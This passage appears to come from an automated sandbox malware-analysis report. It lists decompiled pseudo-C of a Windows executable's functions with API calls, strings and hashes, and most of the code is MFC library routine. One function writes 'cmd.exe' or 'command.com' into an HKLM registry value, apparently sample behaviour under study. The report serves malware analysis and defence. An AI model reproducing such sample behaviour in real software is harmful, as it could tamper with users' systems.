					if(_v20 >= 0x80000000) {
						E0041EB60(_a4, "command.com");
					} else {
						E0041EB60(_a4, "cmd.exe");
					}
					_t48 =  *0x442008; // 0x434684
					_t32 = RegQueryValueExA(_v8, _t48, 0,  &_v24, _a4,  &_v28); // executed
					_v16 = _t32;
					if(_v16 != 0) {
						_t34 = lstrlenA(_a4);
						_t36 =  *0x442008; // 0x434684
						_v16 = RegSetValueExA(_v8, _t36, 0, 1, _a4, _t34 + 1);
					}
					RegCloseKey(_v8);
				}
				return _v16;
			}

APIs

RegCreateKeyExA.ADVAPI32(80000002,004346D4,00000000,00000000,00000000,0002001F,00000000,00000000,?), ref: 00402788
GetVersion.KERNEL32 ref: 004027A2
_strcat.LIBCMT ref: 004027BD
_strcat.LIBCMT ref: 004027D0
RegQueryValueExA.KERNELBASE(00000000,00434684,00000000,?,?,00000104), ref: 004027F1
lstrlenA.KERNEL32(?), ref: 00402804
RegSetValueExA.ADVAPI32(00000000,00434684,00000000,00000001,?,-00000001), ref: 00402820
RegCloseKey.ADVAPI32(00000000), ref: 0040282D

Strings

command.com, xrefs: 004027C7
cmd.exe, xrefs: 004027B4

Memory Dump Source

Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd

Similarity

API ID: Value_strcat$CloseCreateQueryVersionlstrlen
String ID: cmd.exe$command.com
API String ID: 2337509535-906605525
Opcode ID: 23a86dbd8a56b400e1eae7f4a72586dde06780c802320ec2f8d035002184cb91
Instruction ID: 5414f4e155f680cb360236f53e8781cc7486691db9c8143961ece0993b29ec0d
Opcode Fuzzy Hash: 23a86dbd8a56b400e1eae7f4a72586dde06780c802320ec2f8d035002184cb91
Instruction Fuzzy Hash: CB21EAB9D00208EFDB14DFD5DD49BEEB7B8AB48701F108569F605A7280D7B86644CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 0040638F, Relevance: 16.6, APIs: 11, Instructions: 139
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E0040638F(void* __ebx, signed int __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t54;
				void* _t58;
				signed int _t59;
				signed int _t63;
				signed short _t71;
				signed int _t84;
				void* _t94;
				struct HINSTANCE__* _t96;
				signed int _t97;
				void* _t98;
				signed int _t100;
				void* _t101;
				void* _t102;

				_t102 = __eflags;
				_t94 = __edx;
				_push(0x24);
				E0041F71D(E00431E39, __ebx, __edi, __esi);
				_t100 = __ecx;
				 *((intOrPtr*)(_t101 - 0x20)) = __ecx;
				 *(_t101 - 0x1c) =  *(__ecx + 0x60);
				 *(_t101 - 0x18) =  *(__ecx + 0x5c);
				_t54 = E0040DB94(__ebx, __edi, __ecx, _t102);
				_t96 =  *(_t54 + 0xc);
				_t84 = 0;
				_t103 =  *(_t100 + 0x58);
				if( *(_t100 + 0x58) != 0) {
					_t96 =  *(E0040DB94(0, _t96, _t100, _t103) + 0xc);
					_t54 = LoadResource(_t96, FindResourceA(_t96,  *(_t100 + 0x58), 5));
					 *(_t101 - 0x18) = _t54;
				}
				if( *(_t101 - 0x18) != _t84) {
					_t54 = LockResource( *(_t101 - 0x18));
					 *(_t101 - 0x1c) = _t54;
				}
				if( *(_t101 - 0x1c) != _t84) {
					_t86 = _t100;
					 *(_t101 - 0x14) = E00405EC7(_t84, _t100, __eflags);
					E00409D3F(_t84, _t96, __eflags);
					 *(_t101 - 0x28) =  *(_t101 - 0x28) & _t84;
					__eflags =  *(_t101 - 0x14) - _t84;
					 *(_t101 - 0x2c) = _t84;
					 *(_t101 - 0x24) = _t84;
					if(__eflags != 0) {
						__eflags =  *(_t101 - 0x14) - GetDesktopWindow();
						if(__eflags != 0) {
							__eflags = IsWindowEnabled( *(_t101 - 0x14));
							if(__eflags != 0) {
								EnableWindow( *(_t101 - 0x14), 0);
								 *(_t101 - 0x2c) = 1;
								_t84 = E00403ED6();
								__eflags = _t84;
								 *(_t101 - 0x24) = _t84;
								if(__eflags != 0) {
									_t86 = _t84;
									__eflags =  *((intOrPtr*)( *_t84 + 0x120))();
									if(__eflags != 0) {
										_t86 = _t84;
										__eflags = E0040CA70(_t84);
										if(__eflags != 0) {
											_t86 = _t84;
											E0040CA8B(_t84, 0);
											 *(_t101 - 0x28) = 1;
										}
									}
								}
							}
						}
					}
					 *(_t101 - 4) =  *(_t101 - 4) & 0x00000000;
					E0040B748(_t96, __eflags, _t100);
					_t58 = E00409C97(_t84, _t86, _t101,  *(_t101 - 0x14));
					_push(_t96);
					_push(_t58);
					_push( *(_t101 - 0x1c));
					_t59 = E0040619F(_t84, _t100, _t94, _t96, _t100, __eflags); // executed
					_t97 = 0;
					__eflags = _t59;
					if(_t59 != 0) {
						__eflags =  *(_t100 + 0x3c) & 0x00000010;
						if(( *(_t100 + 0x3c) & 0x00000010) != 0) {
							_t98 = 4;
							_t71 = E0040C981(_t100);
							__eflags = _t71 & 0x00000100;
							if((_t71 & 0x00000100) != 0) {
								_t98 = 5;
							}
							E0040982D(_t100, _t98);
							_t97 = 0;
							__eflags = 0;
						}
						__eflags =  *((intOrPtr*)(_t100 + 0x20)) - _t97;
						if( *((intOrPtr*)(_t100 + 0x20)) != _t97) {
							E0040CC5E(_t100, _t97, _t97, _t97, _t97, _t97, 0x97);
						}
					}
					 *(_t101 - 4) =  *(_t101 - 4) | 0xffffffff;
					__eflags =  *(_t101 - 0x28) - _t97;
					if( *(_t101 - 0x28) != _t97) {
						E0040CA8B(_t84, 1);
					}
					__eflags =  *(_t101 - 0x2c) - _t97;
					if( *(_t101 - 0x2c) != _t97) {
						EnableWindow( *(_t101 - 0x14), 1);
					}
					__eflags =  *(_t101 - 0x14) - _t97;
					if(__eflags != 0) {
						__eflags = GetActiveWindow() -  *((intOrPtr*)(_t100 + 0x20));
						if(__eflags == 0) {
							SetActiveWindow( *(_t101 - 0x14));
						}
					}
					 *((intOrPtr*)( *_t100 + 0x60))();
					E00405F01(_t84, _t100, _t97, _t100, __eflags);
					__eflags =  *(_t100 + 0x58) - _t97;
					if( *(_t100 + 0x58) != _t97) {
						FreeResource( *(_t101 - 0x18));
					}
					_t63 =  *(_t100 + 0x44);
					goto L31;
				} else {
					_t63 = _t54 | 0xffffffff;
					L31:
					return E0041F7C2(_t63);
				}
			}

APIs

__EH_prolog3_catch.LIBCMT ref: 00406396
FindResourceA.KERNEL32(?,?,00000005), ref: 004063C9
LoadResource.KERNEL32(?,00000000), ref: 004063D1
LockResource.KERNEL32(?,00000024,00401257,00000000,Local AppWizard-Generated Applications), ref: 004063E2
GetDesktopWindow.USER32 ref: 00406415
IsWindowEnabled.USER32(?), ref: 00406423
EnableWindow.USER32(?,00000000), ref: 00406432

Part of subcall function 0040CA70: IsWindowEnabled.USER32(?), ref: 0040CA79

Part of subcall function 0040CA8B: EnableWindow.USER32(?,?), ref: 0040CA98

EnableWindow.USER32(?,00000001), ref: 0040650E
GetActiveWindow.USER32 ref: 00406519
SetActiveWindow.USER32(?,?,00000024,00401257,00000000,Local AppWizard-Generated Applications), ref: 00406527
FreeResource.KERNEL32(?,?,00000024,00401257,00000000,Local AppWizard-Generated Applications), ref: 00406543

Memory Dump Source

Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd

Similarity

API ID: Window$Resource$Enable$ActiveEnabled$DesktopFindFreeH_prolog3_catchLoadLock
String ID:
API String ID: 1509511306-0
Opcode ID: bf87a749a78ca6df1642d3bac92c0d685b06468b383742aa02b2d1cc5a8d1e5f
Instruction ID: 8608bcd7ad7a3e8128c5f383c3e7d97f5d4ffa180cd5963f6d8b64b71c53f861
Opcode Fuzzy Hash: bf87a749a78ca6df1642d3bac92c0d685b06468b383742aa02b2d1cc5a8d1e5f
Instruction Fuzzy Hash: 1051AD30A00605DBCB21AFA5C985AAFBBB1BF84705F15413EE502B62D2CB785951CF6D

Uniqueness

Uniqueness Score: -1.00%

Function 0040F1AF, Relevance: 16.6, APIs: 11, Instructions: 103
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 80%

			E0040F1AF() {
				struct _CRITICAL_SECTION* _v4;
				char _v28;
				char _v36;
				char _v44;
				intOrPtr _v56;
				void* __ebx;
				intOrPtr __ecx;
				signed int __edi;
				void* __esi;
				void* __ebp;
				struct _CRITICAL_SECTION* _t39;
				intOrPtr _t40;
				void* _t41;
				long _t44;
				void* _t45;
				signed int* _t51;
				intOrPtr _t64;
				long _t68;
				void* _t69;
				void* _t70;
				signed int _t72;
				intOrPtr _t78;
				signed int _t82;
				void* _t86;
				signed int _t88;
				void* _t90;
				void* _t91;
				void* _t93;

				_push(_t72);
				_push(_t69);
				_push(_t88);
				_t86 = _t72;
				_t1 = _t86 + 0x1c; // 0x4465f0
				_t39 = _t1;
				_v4 = _t39;
				EnterCriticalSection(_t39);
				_t3 = _t86 + 4; // 0x20
				_t40 =  *_t3;
				_t4 = _t86 + 8; // 0x3
				_t82 =  *_t4;
				if(_t82 >= _t40) {
					L7:
					_t82 = 1;
					__eflags = _t40 - 1;
					if(_t40 <= 1) {
						L12:
						_t21 = _t40 + 0x20; // 0x40
						_t88 = _t21;
						_t22 = _t86 + 0x10; // 0x5701c0
						_t41 =  *_t22;
						__eflags = _t41;
						if(__eflags != 0) {
							_t69 = GlobalHandle(_t41);
							GlobalUnlock(_t69);
							_t44 = E0040EAD1(_t72, __eflags, _t88, 8);
							_t72 = 0x2002;
							_t45 = GlobalReAlloc(_t69, _t44, ??);
						} else {
							_t68 = E0040EAD1(_t72, __eflags, _t88, 8);
							_pop(_t72);
							_t45 = GlobalAlloc(2, _t68); // executed
						}
						__eflags = _t45;
						if(_t45 != 0) {
							_t70 = GlobalLock(_t45);
							_t25 = _t86 + 4; // 0x20
							__eflags = _t88 -  *_t25 << 3;
							E0041F330(_t82, _t70 +  *_t25 * 8, 0, _t88 -  *_t25 << 3);
							 *(_t86 + 4) = _t88;
							 *(_t86 + 0x10) = _t70;
							goto L20;
						} else {
							_t23 = _t86 + 0x10; // 0x5701c0
							_t86 =  *_t23;
							__eflags = _t86;
							if(_t86 != 0) {
								GlobalLock(GlobalHandle(_t86));
							}
							LeaveCriticalSection(_v4);
							_push(_t88);
							_t90 = _t93;
							_push(_t72);
							_v28 = 0x442350;
							E0041F7F4( &_v28, 0x43c4ec);
							asm("int3");
							_push(_t90);
							_t91 = _t93;
							_push(_t72);
							_t7 =  &_v36; // 0x442350
							_v36 = 0x4423e8;
							E0041F7F4(_t7, 0x43c54c);
							asm("int3");
							_push(_t91);
							_push(_t72);
							_t9 =  &_v44; // 0x4423e8
							_v44 = 0x442480;
							E0041F7F4(_t9, 0x43c590);
							asm("int3");
							_push(4);
							E0041F6EA(E00431BFC, _t69, _t82, _t86);
							_t78 = E0040F014(0x104);
							_v56 = _t78;
							_t64 = 0;
							_v44 = 0;
							if(_t78 != 0) {
								_t64 = E0040D519(_t78);
							}
							return E0041F7C2(_t64);
						}
					} else {
						_t18 = _t86 + 0x10; // 0x5701c0
						_t72 =  *_t18 + 8;
						__eflags = _t72;
						while(1) {
							__eflags =  *_t72 & 0x00000001;
							if(( *_t72 & 0x00000001) == 0) {
								break;
							}
							_t82 = _t82 + 1;
							_t72 = _t72 + 8;
							__eflags = _t82 - _t40;
							if(_t82 < _t40) {
								continue;
							}
							break;
						}
						__eflags = _t82 - _t40;
						if(_t82 < _t40) {
							goto L20;
						} else {
							goto L12;
						}
					}
				} else {
					_t13 = __esi + 0x10; // 0x5701c0
					__ecx =  *_t13;
					__eflags =  *(__ecx + __edi * 8) & 0x00000001;
					if(( *(__ecx + __edi * 8) & 0x00000001) == 0) {
						L20:
						_t30 = _t86 + 0xc; // 0x3
						__eflags = _t82 -  *_t30;
						if(_t82 >=  *_t30) {
							_t31 = _t82 + 1; // 0x4
							 *((intOrPtr*)(_t86 + 0xc)) = _t31;
						}
						_t33 = _t86 + 0x10; // 0x5701c0
						_t51 =  *_t33 + _t82 * 8;
						 *_t51 =  *_t51 | 0x00000001;
						__eflags =  *_t51;
						_t37 = _t82 + 1; // 0x4
						 *(_t86 + 8) = _t37;
						LeaveCriticalSection(_v4);
						return _t82;
					} else {
						goto L7;
					}
				}
			}

APIs

EnterCriticalSection.KERNEL32(004465F0,?,?,?,?,004465D4,0040F5D8,00000004,0040DBA3,004037FD,004048F5,?,00404F86,00000004,004044D3,00000004), ref: 0040F1BE
GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,004465D4,0040F5D8,00000004,0040DBA3,004037FD,004048F5,?,00404F86,00000004,004044D3), ref: 0040F214
GlobalHandle.KERNEL32(005701C0), ref: 0040F21D
GlobalUnlock.KERNEL32(00000000,?,?,?,?,004465D4,0040F5D8,00000004,0040DBA3,004037FD,004048F5,?,00404F86,00000004,004044D3,00000004), ref: 0040F226
GlobalReAlloc.KERNEL32 ref: 0040F23D
GlobalHandle.KERNEL32(005701C0), ref: 0040F24F
GlobalLock.KERNEL32 ref: 0040F256
LeaveCriticalSection.KERNEL32(?,?,?,?,?,004465D4,0040F5D8,00000004,0040DBA3,004037FD,004048F5,?,00404F86,00000004,004044D3,00000004), ref: 0040F260
GlobalLock.KERNEL32 ref: 0040F26C
_memset.LIBCMT ref: 0040F285
LeaveCriticalSection.KERNEL32(?), ref: 0040F2B1

Memory Dump Source

Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd

Similarity

API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock_memset
String ID:
API String ID: 496899490-0
Opcode ID: ab9b4bc25e8910a791046d6b5618164ea1d03aab9b28a44e83847fc91879861a
Instruction ID: 472e247d442e6808826630594bb4930a6e592a8447ca6d80117307b8de69ac9d
Opcode Fuzzy Hash: ab9b4bc25e8910a791046d6b5618164ea1d03aab9b28a44e83847fc91879861a
Instruction Fuzzy Hash: D031AD79204B049FD724CF64DC48A67B7E8FB84344B00497EE852E3A91EB39F9488B18

Uniqueness

Uniqueness Score: -1.00%

Function 0040B3B1, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 90
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E0040B3B1(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				_Unknown_base(*)()* _t31;
				void* _t33;
				void* _t34;
				long _t39;
				void* _t40;
				void* _t43;
				void* _t60;
				void* _t64;
				struct HWND__* _t66;
				CHAR* _t68;
				void* _t71;

				_t64 = __edx;
				_t60 = __ecx;
				_push(0x40);
				E0041F71D(E00432451, __ebx, __edi, __esi);
				_t66 =  *(_t71 + 8);
				_t68 = "AfxOldWndProc423";
				_t31 = GetPropA(_t66, _t68);
				 *(_t71 - 0x14) =  *(_t71 - 0x14) & 0x00000000;
				 *(_t71 - 4) =  *(_t71 - 4) & 0x00000000;
				 *(_t71 - 0x18) = _t31;
				_t58 = 1;
				_t33 =  *(_t71 + 0xc) - 6;
				if(_t33 == 0) {
					_t34 = E00409C97(1, _t60, _t71,  *(_t71 + 0x14));
					E0040B2C5(_t60, E00409C97(1, _t60, _t71, _t66),  *(_t71 + 0x10), _t34);
					goto L9;
				} else {
					_t40 = _t33 - 0x1a;
					if(_t40 == 0) {
						_t58 = 0 | E0040B33B(1, _t66, E00409C97(1, _t60, _t71, _t66),  *(_t71 + 0x14),  *(_t71 + 0x14) >> 0x10) == 0x00000000;
						L9:
						if(_t58 != 0) {
							goto L10;
						}
					} else {
						_t43 = _t40 - 0x62;
						if(_t43 == 0) {
							SetWindowLongA(_t66, 0xfffffffc,  *(_t71 - 0x18));
							RemovePropA(_t66, _t68);
							GlobalDeleteAtom(GlobalFindAtomA(_t68));
							goto L10;
						} else {
							if(_t43 != 0x8e) {
								L10:
								_t39 = CallWindowProcA( *(_t71 - 0x18), _t66,  *(_t71 + 0xc),  *(_t71 + 0x10),  *(_t71 + 0x14)); // executed
								 *(_t71 - 0x14) = _t39;
							} else {
								E004089E1(E00409C97(1, _t60, _t71, _t66), _t71 - 0x30, _t71 - 0x1c);
								 *(_t71 - 0x14) = CallWindowProcA( *(_t71 - 0x18), _t66, 0x110,  *(_t71 + 0x10),  *(_t71 + 0x14));
								E0040A26C(1, _t64, _t49, _t71 - 0x30,  *((intOrPtr*)(_t71 - 0x1c)));
							}
						}
					}
				}
				return E0041F7C2( *(_t71 - 0x14));
			}

APIs

__EH_prolog3_catch.LIBCMT ref: 0040B3B8
GetPropA.USER32 ref: 0040B3C7
CallWindowProcA.USER32 ref: 0040B421

Part of subcall function 0040A26C: GetWindowRect.USER32 ref: 0040A294
Part of subcall function 0040A26C: GetWindow.USER32(?,00000004), ref: 0040A2B1

SetWindowLongA.USER32 ref: 0040B448
RemovePropA.USER32 ref: 0040B450
GlobalFindAtomA.KERNEL32 ref: 0040B457
GlobalDeleteAtom.KERNEL32 ref: 0040B45E

Part of subcall function 004089E1: GetWindowRect.USER32 ref: 004089ED

CallWindowProcA.USER32 ref: 0040B4B2

Strings

AfxOldWndProc423, xrefs: 0040B3C0, 0040B3C5, 0040B44E, 0040B456

Memory Dump Source

Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd

Similarity

API ID: Window$AtomCallGlobalProcPropRect$DeleteFindH_prolog3_catchLongRemove
String ID: AfxOldWndProc423
API String ID: 2702501687-1060338832
Opcode ID: 01eafed39850b2931418d763da063fa8131308eeaf296203092cb49c53425a31
Instruction ID: 0993d68df0da385a064f2654fdce3d9da4ed98816b6640c1b1e46963a59409c9
Opcode Fuzzy Hash: 01eafed39850b2931418d763da063fa8131308eeaf296203092cb49c53425a31
Instruction Fuzzy Hash: 40316D7280020AABCB01AFA4DD49DFF7E78EF45310F00013AF941B21A2C7789A119BA9

Uniqueness

Uniqueness Score: -1.00%

Function 00401450, Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 196
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 91%

			E00401450(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				char _v8;
				char _v16;
				signed int _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				char _v303;
				char _v304;
				char _v2351;
				char _v2352;
				signed int _v2356;
				intOrPtr* _v2360;
				intOrPtr* _v2364;
				intOrPtr _v2392;
				intOrPtr _v2416;
				intOrPtr _v2420;
				intOrPtr _v2444;
				intOrPtr _v2448;
				struct HINSTANCE__* _v2452;
				intOrPtr* _v2456;
				void* __ebp;
				signed int _t101;
				signed int _t102;
				intOrPtr _t111;
				void* _t112;
				intOrPtr _t113;
				void* _t114;
				intOrPtr _t115;
				void* _t116;
				intOrPtr _t117;
				void* _t118;
				char _t119;
				intOrPtr _t129;
				struct HICON__* _t138;
				void* _t141;
				char _t183;
				void* _t201;
				void* _t202;
				signed int _t203;
				void* _t204;
				void* _t205;
				void* _t207;

				_t209 = __eflags;
				_t202 = __esi;
				_t201 = __edi;
				_t141 = __ebx;
				_push(0xffffffff);
				_push(E00431ADC);
				_push( *[fs:0x0]);
				_t205 = _t204 - 0x988;
				_t101 =  *0x443590; // 0x8ffedb05
				_t102 = _t101 ^ _t203;
				_v36 = _t102;
				_push(_t102);
				 *[fs:0x0] =  &_v16;
				_v2456 = __ecx;
				E00405CC0(_v2456, 0x67, _a4);
				_v8 = 0;
				 *_v2456 = 0x434b2c;
				_v2360 = _v2456 + 0x78;
				E0040899E(_v2360, __eflags);
				 *_v2360 = 0x4349f4;
				_v8 = 1;
				_v2364 = _v2456 + 0xcc;
				E0040899E(_v2364, _t209);
				 *_v2364 = 0x4349f4;
				_v8 = 2;
				E00402890(_v2456 + 0x12c);
				_v8 = 3;
				E00402890(_v2456 + 0x134);
				_v8 = 4;
				_v24 = 0;
				_v2356 = 0;
				_v32 = 0;
				_v20 = 0;
				_v28 = 0;
				_t111 =  *0x442014; // 0x43463c
				_t112 = E004024B0(_v2456,  &_v24, _t111); // executed
				if(_t112 == 0) {
					_v32 = 0 | _v24 != 0x00000000;
				}
				_t113 =  *0x442018; // 0x434620
				_t114 = E004024B0(_v2456,  &_v24, _t113); // executed
				if(_t114 == 0) {
					_v20 = 0 | _v24 != 0x00000000;
				}
				_t115 =  *0x44201c; // 0x434600
				_t116 = E004024B0(_v2456,  &_v24, _t115); // executed
				if(_t116 == 0) {
					_v28 = 0 | _v24 != 0x00000000;
				}
				_t117 =  *0x44200c; // 0x434670
				_t118 = E004024B0(_v2456,  &_v24, _t117); // executed
				if(_t118 == 0) {
					_v2356 = 0 | _v24 != 0x00000000;
				}
				_t119 =  *0x4349e8; // 0x0
				_v2352 = _t119;
				E0041F330(_t201,  &_v2351, 0, 0x7ff);
				_t183 =  *0x4349e8; // 0x0
				_v304 = _t183;
				E0041F330(_t201,  &_v303, 0, 0x103);
				_t207 = _t205 + 0x18;
				E004025F0(_v2456,  &_v2352); // executed
				E00402750(_v2456,  &_v304); // executed
				 *(_v2456 + 0x130) = _v2356;
				 *(_v2456 + 0x120) = _v32;
				 *(_v2456 + 0x124) = _v20;
				 *(_v2456 + 0x128) = _v28;
				_v2416 = _v2456 + 0x12c;
				if( &_v2352 != 0) {
					_t129 = E0041F2A0( &_v2352);
					_t207 = _t207 + 4;
					_v2392 = _t129;
				} else {
					_v2392 = 0;
				}
				E00402B10(_t141, _v2416,  &_v2352, _v2392);
				_v2444 = _v2456 + 0x134;
				_t223 =  &_v304;
				if( &_v304 != 0) {
					_v2420 = E0041F2A0( &_v304);
				} else {
					_v2420 = 0;
				}
				E00402B10(_t141, _v2444,  &_v304, _v2420);
				_v2448 =  *((intOrPtr*)(E0040DB94(_t141, _t201, _t202, _t223) + 4));
				_v2452 =  *((intOrPtr*)(E0040DB94(_t141, _t201, _t202, _t223) + 0xc));
				_t138 = LoadIconA(_v2452, 0x65); // executed
				 *(_v2456 + 0x74) = _t138;
				_v8 = 0xffffffff;
				 *[fs:0x0] = _v16;
				return E0041E5DF(_v2456, _t141, _v36 ^ _t203, _v2452, _t201, _t202);
			}

APIs

Part of subcall function 00405CC0: _memset.LIBCMT ref: 00405CD7

Part of subcall function 004024B0: RegCreateKeyExA.KERNELBASE(80000002,004346D4,00000000,00000000,00000000,0002001F,00000000,00000000,00000000,00401561,00000000,0043463C), ref: 004024E8
Part of subcall function 004024B0: RegQueryValueExA.KERNELBASE(00000000,00000000,00000000,?,00000000,00000004), ref: 0040251D
Part of subcall function 004024B0: RegCloseKey.KERNELBASE(00000000), ref: 00402545

_memset.LIBCMT ref: 004015FC
_memset.LIBCMT ref: 0040161E
_strlen.LIBCMT ref: 004016B8
_strlen.LIBCMT ref: 0040170E
LoadIconA.USER32(00000000,00000065), ref: 0040175A

Strings

<FC, xrefs: 0040154C
FC, xrefs: 00401571
pFC, xrefs: 004015BB

Memory Dump Source

Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd

Similarity

API ID: _memset$_strlen$CloseCreateIconLoadQueryValue
String ID: FC$<FC$pFC
API String ID: 615173687-2136651500
Opcode ID: c09a520e972cbed81c92c8a8f446ce9723face874d1e5d1072ee138f9bd11dab
Instruction ID: 457884dcc3c456c3af197bac72be006a206e89a30ea0593d6f0c271eb38810d0
Opcode Fuzzy Hash: c09a520e972cbed81c92c8a8f446ce9723face874d1e5d1072ee138f9bd11dab
Instruction Fuzzy Hash: F3915AB49021189BEB15DF69CD51BEEB7B1AF88308F0041EDE50967382DB786E85CF54

Uniqueness

Uniqueness Score: -1.00%

Function 0040619F, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 158
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 97%

			E0040619F(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t65;
				signed int _t72;
				signed int _t74;
				struct HWND__* _t75;
				struct HWND__* _t76;
				signed int _t78;
				signed int _t95;
				intOrPtr* _t103;
				signed int _t110;
				void* _t124;
				signed int _t129;
				DLGTEMPLATE* _t130;
				struct HWND__* _t131;
				void* _t132;

				_t128 = __esi;
				_t124 = __edx;
				_t104 = __ecx;
				_push(0x3c);
				E0041F71D(E00431E1E, __ebx, __edi, __esi);
				_t103 = __ecx;
				 *((intOrPtr*)(_t132 - 0x20)) = __ecx;
				_t136 =  *(_t132 + 0x10);
				if( *(_t132 + 0x10) == 0) {
					 *(_t132 + 0x10) =  *(E0040DB94(__ecx, 0, __esi, _t136) + 0xc);
				}
				_t129 =  *(E0040DB94(_t103, 0, _t128, _t136) + 0x3c);
				 *(_t132 - 0x28) = _t129;
				 *(_t132 - 0x14) = 0;
				 *(_t132 - 4) = 0;
				E0040C572(_t103, _t104, 0, _t129, _t136, 0x10); // executed
				E0040C572(_t103, _t104, 0, _t129, _t136, 0x7c000);
				if(_t129 == 0) {
					_t130 =  *(_t132 + 8);
					L7:
					__eflags = _t130;
					if(_t130 == 0) {
						L4:
						_t65 = 0;
						L32:
						return E0041F7C2(_t65);
					}
					E0040320E(_t132 - 0x1c, E0040EA5E());
					 *(_t132 - 4) = 1;
					 *((intOrPtr*)(_t132 - 0x18)) = 0;
					__eflags = E00410CB1(__eflags, _t130, _t132 - 0x1c, _t132 - 0x18);
					__eflags =  *0x4465cc; // 0x0
					_t72 = 0 | __eflags == 0x00000000;
					if(__eflags == 0) {
						L14:
						__eflags = _t72;
						if(__eflags == 0) {
							L17:
							 *(_t103 + 0x44) =  *(_t103 + 0x44) | 0xffffffff;
							 *(_t103 + 0x3c) =  *(_t103 + 0x3c) | 0x00000010;
							E0040B748(0, __eflags, _t103);
							_t74 =  *(_t132 + 0xc);
							__eflags = _t74;
							if(_t74 != 0) {
								_t75 =  *(_t74 + 0x20);
							} else {
								_t75 = 0;
							}
							_t76 = CreateDialogIndirectParamA( *(_t132 + 0x10), _t130, _t75, E00405BFB, 0); // executed
							_t131 = _t76;
							E00403036( *((intOrPtr*)(_t132 - 0x1c)) + 0xfffffff0, _t124);
							 *(_t132 - 4) =  *(_t132 - 4) | 0xffffffff;
							_t110 =  *(_t132 - 0x28);
							__eflags = _t110;
							if(__eflags != 0) {
								 *((intOrPtr*)( *_t110 + 0x18))(_t132 - 0x48);
								__eflags = _t131;
								if(__eflags != 0) {
									 *((intOrPtr*)( *_t103 + 0x12c))(0);
								}
							}
							_t78 = E00409D3F(_t103, 0, __eflags);
							__eflags = _t78;
							if(_t78 == 0) {
								 *((intOrPtr*)( *_t103 + 0x114))();
							}
							__eflags = _t131;
							if(_t131 != 0) {
								__eflags =  *(_t103 + 0x3c) & 0x00000010;
								if(( *(_t103 + 0x3c) & 0x00000010) == 0) {
									DestroyWindow(_t131);
									_t131 = 0;
									__eflags = 0;
								}
							}
							__eflags =  *(_t132 - 0x14);
							if( *(_t132 - 0x14) != 0) {
								GlobalUnlock( *(_t132 - 0x14));
								GlobalFree( *(_t132 - 0x14));
							}
							__eflags = _t131;
							_t59 = _t131 != 0;
							__eflags = _t59;
							_t65 = 0 | _t59;
							goto L32;
						}
						L15:
						E00410C7A(_t103, _t132 - 0x38, 0, _t132, _t130);
						 *(_t132 - 4) = 2;
